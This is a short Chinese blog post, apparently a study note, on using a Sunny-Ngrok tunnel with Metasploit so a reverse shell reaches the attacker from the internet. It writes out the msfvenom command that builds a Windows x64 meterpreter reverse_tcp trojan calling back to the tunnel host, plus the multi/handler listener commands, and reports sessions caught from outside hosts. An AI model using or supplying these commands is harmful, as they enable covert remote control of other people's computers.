欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

metasploit学习--Sunny-Ngrok内网穿透

程序员文章站 2022-07-15 13:41:47
...

一、Sunny-Ngrok内网穿透
1.首先去官网注册账号,然后购买隧道

2.选择开通隧道,选免费的那个,然后选择tcp,其他随便写,本地端口就写127.0.0.1:xxx实际端口
metasploit学习--Sunny-Ngrok内网穿透
3.下载客户端http://www.ngrok.cc/download.html,什么版本就下对应版本
metasploit学习--Sunny-Ngrok内网穿透

4.登陆隧道./sunny clientid 隧道id
metasploit学习--Sunny-Ngrok内网穿透

查看隧道id
metasploit学习--Sunny-Ngrok内网穿透

5.生成木马

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell.exe

这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了。
注意:
-a x64位,一定要对应-p x64位。
简单点来说,生成的exe是64位的,最好是只在64位的电脑上去运行。
千万不要把生成32位的exe放到64位的电脑上去运行,那样会造成失败或内存、CPU很高的情况。
6.msf开启监听,使用模块

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit

这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run
7.结果,获取成功
metasploit学习--Sunny-Ngrok内网穿透
外网主机也可以获取
metasploit学习--Sunny-Ngrok内网穿透

相关标签: msf